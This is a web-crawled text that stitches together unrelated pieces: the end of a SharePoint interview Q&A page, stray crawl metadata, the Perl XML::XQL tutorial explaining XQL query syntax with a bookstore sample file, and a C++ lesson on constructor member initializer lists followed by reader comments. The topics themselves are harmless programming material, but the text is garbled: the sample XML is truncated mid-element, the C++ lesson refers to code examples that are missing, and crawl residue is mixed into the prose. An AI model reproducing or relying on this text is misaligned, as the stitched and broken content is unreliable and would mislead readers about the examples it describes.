Cache contains assembly code or machine code which is used to run a program. It gives custom binaries place into full trust code groups. The binaries are deployed to be used between the sender and the receiver. After signing, the binary will have a public key identifier for itself so that it can be used by the sender and receiver. GAC can be used with .NET assemblies cache for the command line platform. 9. Explain the concept of Content-type in SharePoint. Answer: SharePoint has a facility of Contents, hence the Content-type is referred to as a reusable collection of settings and metadata to represent a particular content. For example, an employee content type may have a set of metadata like employee_id, employee_name, salary, etc. It helps organize the content in a more meaningful and organized way. It also supports the inheritance of all properties and appearances. 10. What is a Theme? Answer: Themes are a tool to customize a site as per the user’s needs. It applies lightweight branding by changing the overall site layout, colors, background, headers, etc. The latest version has an expandable theming engine with many new facilities which makes customization easier. It provides the creation of os font schemes and color palettes. These user-specific themes can be added to the theme gallery and be saved. Recommended Article This has been a guide to List Of SharePoint Interview Questions and Answers so that the candidate can crackdown these SharePoint Interview Questions easily. You may also look at the following articles to learn more –
https://www.educba.com/sharepoint-interview-questions/?source=leftnav
CC-MAIN-2021-04
refinedweb
796
55.74
XML::XQL::Tutorial - Describes the XQL query syntax This document describes basic the features of the XML Query Language (XQL.) A proposal for the XML Query Language (XQL) specification was submitted to the XSL Working Group in September 1998. The spec can be found at. Since it is only a proposal at this point, things may change, but it is very likely that the final version will be close to the proposal. Most of this document was copied straight from the spec. See also the XML::XQL man page. XQL (XML Query Language) provides a natural extension to the XSL pattern language. It. XQL is designed to be used in many contexts. Although it is a superset of XSL patterns, it is also applicable to providing links to nodes, for searching repositories, and for many other applications. Note that the term XQL is a working term for the language described in this proposal. It is not their intent that this term be used permanently. Also, beware that another query language exists called XML-QL, which uses a syntax very similar to SQL. The XML::XQL module has added functionality to the XQL spec, called XQL+. To allow only XQL functionality as described in the spec, use the XML::XQL::Strict module. Note that the XQL spec makes the distinction between core XQL and XQL extensions. This implementation makes no distinction and the Strict module, therefore, implements everything described in the XQL spec. See the XML::XQL man page for more information about the Strict module. This tutorial will clearly indicate when referring to XQL+. This section describes the core XQL notation. These features should be part of every XQL implementation, and serve as the base level of functionality for its use in different technologies. The basic syntax for XQL mimics the URI directory navigation syntax, but instead of specifying navigation through a physical file structure, the navigation is through elements in the XML tree. For example, the following URI means find the foo.jpg file within the bar directory: bar/foo.jpg Similarly, in XQL, the following means find the collection of fuz elements within baz elements: baz/fuz Throughout this document you will find numerous samples. They refer to the data shown in the sample file at the end of this man page. A context is the set of nodes against which a query operates. For the entire query, which is passed to the XML::XQL::Query constructor through the Expr option, the context is the list of input nodes that is passed to the query() method. XQL allows a query to select between using the current context as the input context and using the 'root context' as the input context. The 'root context' is a context containing only the root-most element of the document. When using XML::DOM, this is the Document object. By default, a query uses the current context. A query prefixed with '/' (forward slash) uses the root context. A query may optionally explicitly state that it is using the current context by using the './' (dot, forward slash) prefix. Both of these notations are analogous to the notations used to navigate directories in a file system. The './' prefix is only required in one situation. A query may use the '//' operator to indicate recursive descent. When this operator appears at the beginning of the query, the initial '/' causes the recursive decent to perform relative to the root of the document or repository. The prefix './/' allows a query to perform a recursive descent relative to the current context. Find all author elements within the current context. Since the period is really not used alone, this example forward-references other features: ./author Note that this is equivalent to: author Find the root element (bookstore) of this document: /bookstore Find all author elements anywhere within the current document: //author Find all books where the value of the style attribute on the book is equal to the value of the specialty attribute of the bookstore element at the root of the document: book[/bookstore/@specialty = @style] The collection returned by an XQL expression preserves document order, hierarchy, and identity, to the extent that these are defined. That is, a collection of elements will always be returned in document order without repeats. Note that the spec states that the order of attributes within an element is undefined, but that this implementation does keep attributes in document order. See the XML::XQL man page for more details regarding Document Order. The collection of all elements with a certain tag name is expressed using the tag name itself. This can be qualified by showing that the elements are selected from the current context './', but the current context is assumed and often need not be noted explicitly. Find all first-name elements. These examples are equivalent: ./first-name first-name Find all unqualified book elements: book Find all first.name elements: The collection of elements of a certain type can be determined using the path operators ('/' or '//'). These operators take as their arguments a collection (left side) from which to query elements, and a collection indicating which elements to select (right side). The child operator ('/')selects from immediate children of the left-side collection, while the descendant operator ('//') selects from arbitrary descendants of the left-side collection. In effect, the '//' can be thought of as a substitute for one or more levels of hierarchy. Note that the path operators change the context as the query is performed. By stringing them together users can 'drill down' into the document. Find all first-name elements within an author element. Note that the author children of the current context are found, and then first-name children are found relative to the context of the author elements: author/first-name Find all title elements, one or more levels deep in the bookstore (arbitrary descendants): bookstore//title Note that this is different from the following query, which finds all title elements that are grandchildren of bookstore elements: bookstore/*/title Find emph elements anywhere inside book excerpts, anywhere inside the bookstore: bookstore//book/excerpt//emph Find all titles, one or more levels deep in the current context. Note that this situation is essentially the only one where the period notation is required: .//title An element can be referenced without using its name by substituting the '*' collection. The '*' collection returns all elements that are children of the current context, regardless of their tag name. Find all element children of author elements: author/* Find all last-names that are grand-children of books: book/*/last-name Find the grandchildren elements of the current context: */* Find all elements with specialty attributes. Note that this example uses subqueries, which are covered in Filters, and attributes, which are discussed in Finding an attribute: *[@specialty] Attribute names are preceded by the '@' symbol. XQL is designed to treat attributes and sub-elements impartially, and capabilities are equivalent between the two types wherever possible. Note: attributes cannot contain subelements. Thus, attributes cannot have path operators applied to them in a query. Such expressions will result in a syntax error. The XQL spec states that attributes are inherently unordered and indices cannot be applied to them, but this implementation allows it. Find the style attribute of the current element context: @style Find the exchange attribute on price elements within the current context: price/@exchange The following example is not valid: price/@exchange/total Find all books with style attributes. Note that this example uses subqueries, which are covered in Filters: book[@style] Find the style attribute for all book elements: book/@style XQL query expressions may contain literal values (i.e. constants.) Numbers (integers and floats) are wrapped in XML::XQL::Number objects and strings in XML::XQL::Text objects. Booleans (as returned by true() and false()) are wrapped in XML::XQL::Boolean objects. Strings must be enclosed in single or double quotes. Since XQL does not allow escaping of special characters, it's impossible to create a string with both a single and a double quote in it. To remedy this, XQL+ has added the q// and qq// string delimiters which behave just like they do in Perl. For Numbers, exponential notation is not allowed. Use the XQL+ function eval() to circumvent this problem. See XML::XQL man page for details. The empty list or undef is represented by [] (i.e. reference to empty array) in this implementation. Integer Numbers: 234 -456 Floating point Numbers: 1.23 -0.99 Strings: "some text with 'single' quotes" 'text with "double" quotes' Not allowed: 1.23E-4 (use eval("1.23E-4", "Number") in XQL+) "can't use \"double \"quotes" (use q/can't use "double" quotes/ in XQL+) Parentheses can be used to group collection operators for clarity or where the normal precedence is inadequate to express an operation. Constraints and branching can be applied to any collection by adding a filter clause '[ ]' to the collection. The filter is analogous to the SQL WHERE clause with ANY semantics. The filter contains a query within it, called the subquery. The subquery evaluates to a Boolean, and is tested for each element in the collection. Any elements in the collection failing the subquery test are omitted from the result collection. For convenience, if a collection is placed within the filter, a Boolean TRUE is generated if the collection contains any members, and a FALSE is generated if the collection is empty. In essence, an expression such as author/degree implies a collection-to-Boolean conversion function like the following mythical 'there-exists-a' method. author[.there-exists-a(degree)] Note that any number of filters can appear at a given level of an expression. Empty filters are not allowed. Find all books that contain at least one excerpt element: book[excerpt] Find all titles of books that contain at least one excerpt element: book[excerpt]/title Find all authors of books where the book contains at least one excerpt, and the author has at least one degree: book[excerpt]/author[degree] Find all books that have authors with at least one degree: book[author/degree] Find all books that have an excerpt and a title: book[excerpt][title] Users can explicitly indicate whether to use any or all semantics through the $any$ and $all$ keywords. $any$ flags that a condition will hold true if any item in a set meets that condition. $all$ means that all elements in a set must meet the condition for the condition to hold true. $any$ and $all$ are keywords that appear before a subquery expression within a filter. Find all author elements where one of the last names is Bob: author[last-name = 'Bob'] author[$any$ last-name = 'Bob'] Find all author elements where none of the last-name elements are Bob: author[$all$ last-name != 'Bob'] Find all author elements where the first last name is Bob: author[last-name[0] = 'Bob'] XQL makes it easy to find a specific node within a set of nodes. Simply enclose the index ordinal within square brackets. The ordinal is 0 based. A range of elements can be returned. To do so, specify an expression rather than a single value inside of the subscript operator (square brackets). Such expressions can be a comma separated list of any of the following: n Returns the nth element -n Returns the element that is n-1 units from the last element. E.g., -1 means the last element. -2 is the next to last element. m $to$ n Returns elements m through n, inclusive Find the first author element: author[0] Find the third author element that has a first-name: author[first-name][2] Note that indices are relative to the parent. In other words, consider the following data: <x> <y/> <y/> </x> <x> <y/> <y/> </x> The following expression will return the first y from each of the x's: x/y[0] The following will return the first y from the entire set of y's within x's: (x/y)[0] The following will return the first y from the first x: x[0]/y[0] Find the first and fourth author elements: author[0,3] Find the first through fourth author elements: author[0 $to$ 3] Find the first, the third through fifth, and the last author elements: author[0, 2 $to$ 4, -1] Find the last author element: author[-1] Boolean expressions can be used within subqueries. For example, one could use Boolean expressions to find all nodes of a particular value, or all nodes with nodes in particular ranges. Boolean expressions are of the form ${op}$, where {op} may be any expression of the form {b|a} - that is, the operator takes lvalue and rvalue arguments and returns a Boolean result. Note that the XQL Extensions section defines additional Boolean operations. $and$ and $or$ are used to perform Boolean ands and ors. The Boolean operators, in conjunction with grouping parentheses, can be used to build very sophisticated logical expressions. Note that spaces are not significant and can be omitted, or included for clarity as shown here. Find all author elements that contain at least one degree and one award. author[degree $and$ award] Find all author elements that contain at least one degree or award and at least one publication. author[(degree $or$ award) $and$ publication] $not$ is a Boolean operator that negates the value of an expression within a subquery. Find all author elements that contain at least one degree element and that contain no publication elements. author[degree $and$ $not$ publication] Find all author elements that contain publications elements but do not contain either degree elements or award elements. author[$not$ (degree $or$ award) $and$ publication] The $union$ operator (shortcut is '|') returns the combined set of values from the query on the left and the query on the right. Duplicates are filtered out. The resulting list is sorted in document order. Note: because this is a union, the set returned may include 0 or more elements of each element type in the list. To restrict the returned set to nodes that contain at least one of each of the elements in the list, use a filter, as discussed in Filters. The $intersect$ operator returns the set of elements in common between two sets. Find all first-names and last-names: first-name $union$ last-name Find all books and magazines from a bookstore: bookstore/(book | magazine) Find all books and all authors: book $union$ book/author Find the first-names, last-names, or degrees from authors within either books or magazines: (book $union$ magazine)/author/(first-name $union$ last-name $union$ degree) Find all books with author/first-name equal to 'Bob' and all magazines with price less than 10: book[author/first-name = 'Bob'] $union$ magazine[price $lt$ 10] The '=' sign is used for equality; '!=' for inequality. Alternatively, $eq$ and $ne$ can be used for equality and inequality. Single or double quotes can be used for string delimiters in expressions. This makes it easier to construct and pass XQL from within scripting languages. For comparing values of elements, the value() method is implied. That is, last-name < 'foo' really means last-name!value() < 'foo'. Note that filters are always with respect to a context. That is, the expression book[author] means for every book element that is found, see if it has an author subelement. Likewise, book[author = 'Bob'] means for every book element that is found, see if it has a subelement named author whose value is 'Bob'. One can examine the value of the context as well, by using the . (period). For example, book[. = 'Trenton'] means for every book that is found, see if its value is 'Trenton'. Find all author elements whose last name is Bob: author[last-name = 'Bob'] author[last-name $eq$ 'Bob'] Find all authors where the from attribute is not equal to 'Harvard': degree[@from != 'Harvard'] degree[@from $ne$ 'Harvard'] Find all authors where the last-name is the same as the /guest/last-name element: author[last-name = /guest/last-name] Find all authors whose text is 'Matthew Bob': author[. = 'Matthew Bob'] author = 'Matthew Bob' A set of binary comparison operators is available for comparing numbers and strings and returning Boolean results. $lt$, $le$, $gt$, $ge$ are used for less than, less than or equal, greater than, or greater than or equal. These same operators are also available in a case insensitive form: $ieq$, $ine$, $ilt$, $ile$, $igt$, $ige$. <, <=, > and >= are allowed short cuts for $lt$, $le$, $gt$ and $ge$. Find all author elements whose last name is bob and whose price is > 50 author[last-name = 'Bob' $and$ price $gt$ 50] Find all authors where the from attribute is not equal to 'Harvard': degree[@from != 'Harvard'] Find all authors whose last name begins with 'M' or greater: author[last-name $ge$ 'M'] Find all authors whose last name begins with 'M', 'm' or greater: author[last-name $ige$ 'M'] Find the first three books: book[index() $le$ 2] Find all authors who have more than 10 publications: author[publications!count() $gt$ 10] XQL+ defines additional operators for pattern matching. The $match$ operator (shortcut is '=~') returns TRUE if the lvalue matches the pattern described by the rvalue. The $no_match$ operator (shortcut is '!~') returns FALSE if they match. Both lvalue and rvalue are first cast to strings. The rvalue string should have the syntax of a Perl rvalue, that is the delimiters should be included and modifiers are allowed. When using delimiters other than slashes '/', the 'm' should be included. The rvalue should be a string, so don't forget the quotes! (Or use the q// or qq// delimiters in XQL+, see XML::XQL man page.) Note that you can't use the Perl substitution operator s/// here. Try using the XQL+ subst() function instead. Find all authors whose name contains bob or Bob: author[first-name =~ '/[Bb]ob/'] Find all book titles that don't contain 'Trenton' (case-insensitive): book[title !~ 'm!trenton!i'] See the XML::XQL man page for other operators available in XQL+. The lvalue of a comparison can be a vector or a scalar. The rvalue of a comparison must be a scalar or a value that can be cast at runtime to a scalar. If the lvalue of a comparison is a set, then any (exists) semantics are used for the comparison operators. That is, the result of a comparison is true if any item in the set meets the condition. The spec states that the lvalue of an expression cannot be a literal. That is, '1' = a is not allowed. This implementation allows it, but it's not clear how useful that is. Elements, attributes and other XML node types are casted to strings (Text) by applying the value() method. The value() method calls the text() method by default, but this behavior can be altered by the user, so the value() method may return other XQL data types. When two values are compared, they are first casted to the same type. See the XML::XQL man page for details on casting. Note that the XQL spec is not very clear on how values should be casted for comparison. Discussions with the authors of the XQL spec revealed that there was some disagreement and their implementations differed on this point. This implementation is closest to that of Joe Lapp from webMethods, Inc. XQL makes a distinction between functions and methods. See the XML::XQL man page for details. XQL provides methods for advanced manipulation of collections. These methods provide specialized collections of nodes (see Collection methods), as well as information about sets and nodes. Methods are of the form method(arglist) Consider the query book[author]. It will find all books that have authors. Formally, we call the book corresponding to a particular author the reference node for that author. That is, every author element that is examined is an author for one of the book elements. (See the Annotated XQL BNF Appendix for a much more thorough definition of reference node and other terms. See also the XML::XQL man page.) Methods always apply to the reference node. For example, the text() method returns the text contained within a node, minus any structure. (That is, it is the concatenation of all text nodes contained with an element and its descendants.) The following expression will return all authors named 'Bob': author[text() = 'Bob'] The following will return all authors containing a first-name child whose text is 'Bob': author[first-name!text() = 'Bob'] The following will return all authors containing a child named Bob: author[*!text() = 'Bob'] Method names are case sensitive. See the XML::XQL man page on how to define your own methods and functions. The following methods provide information about nodes in a collection. These methods return strings or numbers, and may be used in conjunction with comparison operators within subqueries. The text() method concatenates text of the descendents of a node, normalizing white space along the way. White space will be preserved for a node if the node has the xml:space attribute set to 'preserve', or if the nearest ancestor with the xml:space attribute has the attribute set to 'preserve'. When white space is normalized, it is normalized across the entire string. Spaces are used to separate the text between nodes. When entity references are used in a document, spacing is not inserted around the entity refs when they are expanded. In this implementation, the method may receive an optional parameter to indicate whether the text() of Element nodes should include the text() of its Element descendants. See XML::XQL man page for details. Examples: Find the authors whose last name is 'Bob': author[last-name!text() = 'Bob'] Note this is equivalent to: author[last-name = 'Bob'] Find the authors with value 'Matthew Bob': author[text() = 'Matthew Bob'] author[. = 'Matthew Bob'] author = 'Matthew Bob' The rawText() method is similar to the text() method, but it does not normalize whitespace. In this implementation, the method may receive an optional parameter to indicate whether the rawText() of Element nodes should include the rawText() of its Element descendants. See XML::XQL man page for details. Returns a type cast version of the value of a node. If no data type is provided, returns the same as text(). For the purposes of comparison, value( )is implied if omitted. In other words, when two items are compared, the comparison is between the value of the two items. Remember that in absence of type information, value() returns text(). The following examples are equivalent: author[last-name!value() = 'Bob' $and$ first-name!value() = 'Joe'] author[last-name = 'Bob' $and$ first-name = 'Joe'] price[@intl!value() = 'canada'] price[@intl = 'canada'] Returns a number to indicate the type of the node. The values were based on the node type values in the DOM: element 1 attribute 2 text 3 entity 6 (not in XQL spec) PI 7 comment 8 document 9 doc. fragment 10 (not in XQL spec) notation 11 (not in XQL spec) Note that in XQL, CDATASection nodes and EntityReference nodes also return 3, whereas in the DOM CDATASection returns 4 and EntityReference returns 5. Use the XQL+ method DOM_nodeType() to get DOM node type values. See the XML::DOM man page for node type values of nodes not mentioned here. Returns the name of the node type in lowercase or an empty string. The following node types are currently supported 1 (element), 2 (attribute), 3 (text), 7 (processing_instruction), 8 (comment), 9 (document) Returns the tag name for Element nodes and the attribute name of attributes. Returns the index of the value within the search context (i.e. with the input list of the subquery.) This is not necessarily the same as the index of a node within its parent node. Note that the XQL spec doesn't explain it well. Find the first 3 degrees: degree[index() $lt$ 3] Note that it skips over other nodes that may exist between the degree elements. Consider the following data: <x> <y/> <y/> </x> <x> <y/> <y/> </x> The following expression will return the first y from each x: x/y[index() = 0] This could also be accomplished by (see Indexing into a Collection): x/y[0] The end() method returns true for the last element in the search context. Again, the XQL spec does not explain it well. Find the last book: book[end()] Find the last author for each book: book/author[end()] Find the last author from the entire set of authors of books: (book/author)[end()] Returns the number of values inside the search context. In XQL+, when the optional QUERY parameter is supplied, it returns the number of values returned by the QUERY. The following methods can be applied to a node to return namespace information. Returns the local name portion of the node, excluding the prefix. Local names are defined only for element nodes and attribute nodes. The local name of an element node is the local portion of the node's element type name. The local name of an attribute node is the local portion of the node's attribute name. If a local name is not defined for the reference node, the method evaluates to the empty set. Returns the URI for the namespace of the node. Namespace URIs are defined only for element nodes and attribute nodes. The namespace URI of an element node is the namespace URI associated with the node's element type name. The namespace URI of an attribute node is the namespace URI associated with the node's attribute name. If a namespace URI is not defined for the reference node, the method evaluates to the empty set. Returns the prefix for the node. Namespace prefixes are defined only for element nodes and attribute nodes. The namespace prefix of an element node is the shortname for the namespace of the node's element type name. The namespace prefix of an attribute node is the shortname for the namespace of the node's attribute name. If a namespace prefix is not defined for the reference node, the method evaluates to the empty set. The spec states: A node's namespace prefix may be defined within the query expression, within the document under query, or within both the query expression and the document under query. If it is defined in both places the prefixes may not agree. In this case, the prefix assigned by the query expression takes precedence. In this implementation you cannot define the namespace for a query, so this can never happen. Find all unqualified book elements. Note that this does not return my:book elements: book Find all book elements with the prefix 'my'. Note that this query does not return unqualified book elements: my:book Find all book elements with a 'my' prefix that have an author subelement: my:book[author] Find all book elements with a 'my' prefix that have an author subelement with a my prefix: my:book[my:author] Find all elements with a prefix of 'my': my:* Find all book elements from any namespace: *:book Find any element from any namespace: * Find the style attribute with a 'my' prefix within a book element: book/@my:style All attributes of an element can be returned using @*. This is potentially useful for applications that treat attributes as fields in a record. Find all attributes of the current element context: @* Find style attributes from any namespace: @*:style Find all attributes from the 'my' namespace, including unqualified attributes on elements from the 'my' namespace: @my:* This section defines the functions of XQL. The spec states that: XQL defines two kinds of functions: collection functions and pure functions. Collection functions use the search context of the Invocation instance, while pure functions ignore the search context, except to evaluate the function's parameters. A collection function evaluates to a subset of the search context, and a pure function evaluates to either a constant value or to a value that depends only on the function's parameters. Don't worry if you don't get it. Just use them! The collection functions provide access to the various types of nodes in a document. Any of these collections can be constrained and indexed. The collections return the set of children of the reference node meeting the particular restriction. The collection of text nodes. The collection of comment nodes. The collection of processing instruction nodes. The collection of all element nodes. If the optional text parameter is provided, it only returns element children matching that particular name. The collection of all attribute nodes. If the optional text parameter is provided, it only returns attributes matching that particular name. The collection of all non-attribute nodes. Find the second text node in each p element in the current context: p/textNode()[1] Find the second comment anywhere in the document. See Context for details on setting the context to the document root: //comment()[1] Finds the nearest ancestor matching the provided query. It returns either a single element result or an empty set []. Note that this node is never the reference node itself. Find the nearest book ancestor of the current element: ancestor(book) Find the nearest ancestor author element that is contained in a book element: ancestor(book/author) Pure function that evaluates to a set. The set contains an element node that has an 'id' attribute whose value is identical to the string that the Text parameter quotes. The element node may appear anywhere within the document under query. If more than one element node meets these criteria, the function evaluates to a set that contains the first node appearing in a document ordering of the nodes. Pure functions that each evaluate to a Boolean. "true()" evaluates to 'true', and "false()" evaluates to 'false'. These functions are useful in expressions that are constructed using entity references or variable substitution, since they may replace an expression found in an instance of Subquery without violating the syntax required by the instance of Subquery. They return an object of type XML::XQL::Boolean. "date" is a pure function that typecasts the value of its parameter to a set of dates. If the parameter matches a single string, the value of the function is a set containing a single date. If the parameter matches a QUERY, the value of the function is a set of dates, where the set contains one date for each member of the set to which the parameter evaluates. XQL does not define the representation of the date value, nor does it define how the function translates parameter values into dates. This implementation uses the Date::Manip module to parse dates, which accepts almost any imaginable format. See XML::XQL to plug in your own Date implementation. Include the XML::XQL::Date package to add the XQL date type and the date() function, like this: use XML::XQL::Date; XQL+ provides XQL function wrappers for most Perl builtin functions. It also provides other cool functions like subst(), map(), and eval() that allow you to modify documents and embed perl code. If this is still not enough, you can add your own function and methods. See XML::XQL man page for details. The whitepaper 'The Design of XQL' by Jonathan Robie, which can be found at describes the sequence operators ';;' (precedes) and ';' (immediately precedes.) Although these operators are not included in the XQL spec, I thought I'd add them anyway. With the following input: <TABLE> <ROWS> <TR> <TD>Shady Grove</TD> <TD>Aeolian</TD> </TR> <TR> <TD>Over the River, Charlie</TD> <TD>Dorian</TD> </TR> </ROWS> </TABLE> Find the TD node that contains "Shady Grove" and the TD node that immediately follows it: //(TD="Shady Grove" ; TD) Note that in XML::DOM there is actually a text node with whitespace between the two TD nodes, but those are ignored by this operator, unless the text node has 'xml:space' set to 'preserve'. See ??? for details. With the following input (from Hamlet): <SPEECH> <SPEAKER>MARCELLUS</SPEAKER> <LINE>Tis gone!</LINE> <STAGEDIR>Exit Ghost</STAGEDIR> <LINE>We do it wrong, being so majestical,</LINE> <LINE>To offer it the show of violence;</LINE> <LINE>For it is, as the air, invulnerable,</LINE> <LINE>And our vain blows malicious mockery.</LINE> </SPEECH> Return the STAGEDIR and all the LINEs that follow it: SPEECH//( STAGEDIR ;; LINE ) Suppose an actor playing the ghost wants to know when to exit; that is, he wants to know who says what line just before he is supposed to exit. The line immediately precedes the stagedir, but the speaker may occur at any time before the line. In this query, we will use the "precedes" operator (";;") to identify a speaker that precedes the line somewhere within a speech. Our ghost can find the required information with the following query, which selects the speaker, the line, and the stagedir: SPEECH//( SPEAKER ;; LINE ; STAGEDIR="Exit Ghost") The following table lists operators in precedence order, highest precedence first, where operators of a given row have the same precedence. The table also lists the associated productions: Production Operator(s) ---------- ----------- Grouping ( ) Filter [ ] Subscript [ ] Bang ! Path / // Match $match$ $no_match$ =~ !~ (XQL+ only) Comparison = != < <= > >= $eq$ $ne$ $lt$ $le$ $gt$ $ge$ $ieq$ $ine$ $ilt$ $ile$ $igt$ $ige$ Intersection $intersect$ Union $union$ | Negation $not$ Conjunction $and$ Disjunction $or$ Sequence ; ;; This file is also stored in samples/bookstore.xml that comes with the XML::XQL distribution. <?xml version='1.0'?> <!-- This file represents a fragment of a book store inventory database --> <bookstore specialty='novel'> <book style='autobiography'> <title>Seven Years in Trenton</title> <author> <first-name>Joe</first-name> <last-name>Bob</last-name> <award>Trenton Literary Review Honorable Mention</award> </author> <price>12</price> </book> <book style='textbook'> <title>History of Trenton</title> <author> <first-name>Mary</first-name> <last-name>Bob</last-name> <publication> Selected Short Stories of <first-name>Mary</first-name> <last-name>Bob</last-name> </publication> </author> <price>55</price> </book> <magazine style='glossy' frequency='monthly'> <title>Tracking Trenton</title> <price>2.50</price> <subscription price='24' per='year'/> </magazine> <book style='novel' id='myfave'> <title>Trenton Today, Trenton Tomorrow</title> <author> <first-name>Toni</first-name> <last-name>Bob</last-name> <degree from='Trenton U'>B.A.</degree> <degree from='Harvard'>Ph.D.</degree> <award>Pulizer<> <my:book <my:title>Who's Who in Trenton</my:title> <my:author>Robert Bob</my:author> </my:book> </bookstore> The Japanese version of this document can be found on-line at XML::XQL, XML::XQL::Date, XML::XQL::Query and XML::XQL::DOM
http://search.cpan.org/dist/libxml-enno/lib/XML/XQL/Tutorial.pod
CC-MAIN-2016-18
refinedweb
5,768
53.81
: Initial.. Member initializer lists work both with fundamental types and members that are classes themselves. Quiz Time 1) Write a class named RGBA that contains 4 member variables of type std::uint8_t named m_red, m_green, m_blue, and m_alpha (#include cstdint to access type std::uint8_t). Assign default values of 0 to m_red, m_green, and m_blue, and 255 to m_alpha. Create a constructor that uses a member initializer list that allows the user to initialize values for m_red, m_blue, m_green, and Just curious, I got almost everything correct except for the part where printing requires "static_cast<int>(color)". May I ask what is static_cast<int>? Hi Travis! static_cast converts a value of type A to a value of type B. Casting is covered in lesson 4.4a (Explicit type conversion (casting)). I suggest you to also read Alex' comment in the same lesson about reinterpret_cast and dynamic_cast #include <iostream> //#include <cstdint> using namespace std; class RGBA { uint8_t m_R; uint8_t m_G; uint8_t m_B; uint8_t m_A; public: RGBA( uint8_t R={0}, uint8_t G={}, uint8_t B={}, uint8_t A={255} ) : m_R(R), m_G(G), m_B(B), m_A(A) {} void print(){ cout << " R: " << static_cast<int>(m_R) << " G: " << static_cast<int>(m_G) << " B: " << static_cast<int>(m_B) << " A: " << static_cast<int>(m_A) << endl; } }; int main() { RGBA foo(2, 3); foo.print(); return 0; C:UsersAmyCLionProjectsConcurrencyuntitled24cmake-build-debuguntitled24.exe Hello, World! R: 2 G: 3 B: 0 A: 255 R: 2 G: 3 B: 0 A: 255 Process finished with exit code 0 RGBA( uint8_t R={0}, uint8_t G={}, uint8_t B={}, uint8_t A={255} ) note the ={} is needed I thought Green==2 and Blue==4 <compiler issue maybe> C:Program Filesmingw-w64x86_64-7.2.0-win32-seh-rt_v5-rev1mingw64 same on the C:cygwin64 v2.10.0 #include <iostream> using namespace std; class abc{ public: const int a=8; abc():a(45) { } }; By writing this code we are changing the constant variable. it means we can re-initialize the constant member using initializer list. > By writing this code we are changing the constant variable. No, you aren't. The default value of 8 is only used to initialize member 'a' in cases where no explicit initializer for 'a' is provided by the constructor. If an explicit initializer is provided (which your default constructor does), that initialization value is used instead (not also). Therefore, member 'a' will initialized once, and the value will not be overwritten. No re-initialization takes place, and no violation of const occurs. I use your code in to test the difference between the non-object-oriented with c++ 11 constructor member initializer list. C++ 11 style is about 50 times faster than the non-object oriented style. [xx OFtutorial0_helloWorld]$ whatAboutThisGuy Time elapsed: 7.506e-06 Time elapsed: 1.47e-07 [xx OFtutorial0_helloWorld]$ whatAboutThisGuy Time elapsed: 8.664e-06 Time elapsed: 1.9e-07 [xx OFtutorial0_helloWorld]$ whatAboutThisGuy Time elapsed: 7.646e-06 Time elapsed: 1.89e-07 Just play with it. Hey Alex, any feedback I can get on this? (I tried using an std::array for the RGBA quiz, also I prefix any classes with the letter C so my code will have CRGBA instead of RGBA). Thanks for the great tutorials, finally I made it to the best bits :glasses: Looks good. A few minor suggestions: 1) I don't think it's necessary to cause ColorComponent::MAX_COLORS to a uint8_t -- enums are already treated as integers. 2) If ColorComponent is only going to be used inside the CRGBA class, it would be better to define ColorComponent inside the CRGBA class (without the ColorComponent namespace). That way it's clear the two are linked, and you won't have to use the ColorComponent prefix inside the class. That makes sense, thanks! Initializing const member variables at run-time or with users’ input. I never thought this would work because in the previous lessons const/reference member variables have to be initialized, but the below code bypassed it. Const just means the variables needs to be initialized with a value, and past that point the value can't be changed. Your program doesn't violate that at all. The following simpler program works too: Hi Alex, I think you should mention how to write the Member Initializer Lists outside the class definition. I know that it may not be the ideal thing to do but it is an option that we can use. For Example: Point2d.h Point2d.cpp I don't cover member functions outside the class definition until lesson 8.9. I've updated that lesson to show an example of a member initialization list outside the class definition. Hi, Alex. You have awesome tutorials. I'm wondering why the member variables of RGBA class have to be cast to int in the print() function. Why, if I don't cast them, the program won't output the values? Hey Hieu. m_red, m_green, m_blue, and m_alpha are of the "std::uint8_t" type. He is casting them to int because "std::cout" may treat "std::uint8_t" as a "char" type. Which would print a character to the screen instead. uint8_t is mostly like a typecast for an unsigned char, so printing the value will print the character whose ASCII code is that value. Not what we're looking for here. Casting to an int ensures we print the numeric value. Hey it just keeps getting more and more interesting and powerfull and you seem to be able to keep the same high quality of explanations. With all of this learned on constructors does that mean a class should only ever have one constructor ? Default values and initializer lists seem to make it possible for most cases. thanks. It's totally fine for classes to have multiple constructors (if it makes sense for the class to be initialized in different ways). Hi Alex, In The Given Code :- How Can We Instantiate an object of Class A on Line-12 if the default constructor isn't provided in Class A? Reply Please 🙂 We don't ever create an object of type A without a parameter, so a default constructor isn't needed. B b(5) instantiates an object of type B, which allocates memory for B, including the member m_a of type A. B's constructor is then executed with parameter 5, and the variable m_a is initialized using the A(int) constructor to the value of 4. Remember, classes are just type definitions. They do not actually allocate memory until an object of the class is instantiated. I think you got me wrong ! Let Me Start Again. We know that compilation starts from the start of the program.Yes? Ok, So When It Encounters Class A it doesnt allocate any memory for it as we know that it is just a type definition. Then It Goes to Class B and there it encounters A m_a but then, Shouldn't it flag it as an error as there is no default constructor provided in Class A? No, because a default constructor for A is never called. We only ever initialize A with an integer parameter, so we only need a constructor that can handle an int. It is called on LINE 12, No? No. Line 12 just tells the compiler that B contains an A member named m_a. Initialization is handled via the constructors. So, Why does this print "A"? Shouldn't it just "tell" the compiler that B contains A member name m_a? If you don't explicitly tell the compiler how to initialize a member that is itself a class, the compiler will default to using the default constructor. In this case, the B constructor doesn't initialize m_a, so the compiler uses the default constructor for A to initialize m_a. Just Like That, In The 1st Case We Haven't told the compiler how to initialize member m_a till Line 14. So Why it doesn't flag that line 12 as an error? Because it's just part of the type definition, it doesn't actually instantiate anything, so there's no need to specify how the variable is initialized at that point. Look, we all know that a variable can only be created once.Yes? So, In The Section : "Member Initialization Lists", How can we create a single member variable twice; 1st, When we create it. Example :- 2nd, When we initialize it using member initialization lists(initialization involves CREATION too !) Example :- I hope you have understood my question 🙂 Three things: 1) This is a variable definition: 2) This is a variable initialization: 3) This is the variable instantiation: When we instantiate variable s (of type Something), the member m_value is created. It is then initialized by the constructor. That's what i'm asking bro ! When Vairiable m_value is created for the 1st time, How Can it be initialized (which involves creation too !) ? The following isn't valid, No? No, that's not valid, as it's a redefinition of x. When you type "int x = 5", variable x is first given a memory location, and then it is initialized to 5. With classes, when you instantiate an object, the object is first given a memory location, and then the constructor is called to initialize the object. With fundamental variables, the definition and initialization are done in the same line. With classes, the definition and initialization are defined on separate lines. This was done so that different constructors can initialize members in different ways, depending on which constructor was called. So, It Means Re-Creation is allowed in the case of classes ! I don't know what "re-creation" means in this case. As I said, the difference is that in classes, the definition and initialization happen in separate places. The compiler handles the details. There's no redefinitions here. It means things "like" these is allowed in the case of classes :- note:- I have said "LIKE". I get what you're thinking here, but I think that's a bit misleading. In the int 